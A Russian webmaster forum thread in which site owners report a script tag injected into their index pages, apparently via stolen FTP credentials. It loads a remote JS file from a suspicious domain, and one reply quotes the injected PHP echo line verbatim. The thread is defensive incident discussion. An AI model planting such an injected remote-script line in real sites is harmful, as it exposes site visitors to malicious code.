А вот и "левый" код у меня появился
Страницы: 1
А вот и "левый" код у меня появился, отключаем детскую наивность...
В 7-49 мск одновременно 7 сайтов на 3 разных хостингах, но у одного хостера получили в довесок последней строкой в индексной странице вызов удаленного js-скрипта со странного домена. Причём внедряльщик чётко разделял html от php и внедрялся по-разному (в php через print). Странно, чтопострадали только выборочные сайты, никак не связанные друг с другом ни конкретным IP, ни тематикой, ни внутренней структурой. Код ничего не делал на момент обнаружения, подозреваю, что это готовится сюрприз на "каникулы".
ссылка на внедрённый код была следующей : _http:// kinoshkaxa. changeip. name/rsize.js
Узнать, что он собирался делать мне, видимо, не судьба, к счастью...
Отписался в ТП хостинга, но, блин, 31 декабря... Грешу на свой клиент FTP, в котором я, по-наивности, держал сохраненными пароли от ftp-доступа. Пароли срочно поменял, сохранение, естесственно, отключил.
Чур меня, чур! smile:confused:
Мы не можем похвастаться мудростью глаз
И умелыми жестами рук,
Нам не нужно все это, чтобы друг друга понять.
Сигареты в руках, чай на столе - так замыкается круг,
И вдруг нам становится страшно что-то менять.
Цитата
Злой, но Позитивный ЧЕЛовек пишет:
Грешу на свой клиент FTP, в котором я, по-наивности, держал сохраненными пароли от ftp-доступа.
А почему-бы не поставить блокировку по IP?
Цитата
Scorpion71 пишет:
А почему-бы не поставить блокировку по IP?
дык динамический у меня адрес... мало того, я ещё и дислокацию меняю (в 4 разных совершенно городах живу постоянно), он у меня - супердинамический smile:)
Цитата
Злой, но Позитивный ЧЕЛовек пишет:
дык динамический у меня адрес... мало того, я ещё и дислокацию меняю (в 4 разных совершенно городах живу постоянно), он у меня - супердинамический smile:)
Пропиши все свои подсети тогда smile:)
Такой код echo '<script src="kinoshkaxa.changeip.name/rsize.js"></script>';  и у меня появился в index.php в самом низу, хорошо что каспер среагировал, раньше чем робот яндекса, а то щас бы сидел с пометкой ваш сайт опасен )))
Аналогично. Судя по дате инфицирования - предполагаю, что это результат работы вируса, заражающего hosts на компе, в результате чего появляется надпись STOP "Доступ к сайту запрещен" +7XXXX....
Видимо заражает сайты через "Total Commander" Но принцип заражения не совсем понятен т.к. не все index.php index.html дописывает.
Блокировка по IP ничем не поможет. Скорее всего у Вас троян на компе. Проверяли компьютер на вирусы?
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
13:04 Скан глаза для Zoom и Tinder + ап Яндекса 21 апреля. К этому реально всё идёт? 
13:01 Заказал "положить сайт" а положили тебя? Полиция добралась до клиентов DDoS-сервисов 
11:29 В Яндексе позиции держатся, а трафик проседает - стало заметно сильнее 
11:28 Claude по паспорту + апдейт Яндекса 17 апреля - у кого что по выдаче 
11:23 Штрафы за крипту до 2 млн + ап Яндекса 19 апреля - что опять поменяли и куда всё катится? 
17:05 ИКС Яндекс АПдейт 1 апреля 2026. Обновлён алгоритм расчёта 
16:58 Ап выдачи Яндекса 8 апреля - есть движение, но интереснее что творится с AI-ответами Google 
13:39 Вериф аккаунты АВИТО + платежи 
11:34 Прошу оценить сайт 
10:26 Мониторинг обменников Сrypto-scout.io 
09:13 Monitex: Мониторинг с кэшбэком 80% в USDT 
05:09 От $0.015 за IP | $0.68 за ГБ | 9PROXY.COM | 20+ млн резидентных прокси | 99,95% аптайм | Без чёрных списков 
23:49 GoodsMoney.io 
23:48 Volna.money 
11:31 Список обновленных тем пуст... 
11:21 ЕС сделал проверку возраста, а её уже ломают за минуты. Серьёзно? 
19:57 Во Франции начали штрафовать за IPTV - до 300-400 евро уже прилетает обычным пользователям 
17:02 арбитражники 
12:26 Заработок на загрузочном сайте в 2026? 
09:49 Точные прогнозы на футбол 
02:22 Ставки на супер тренды в спорте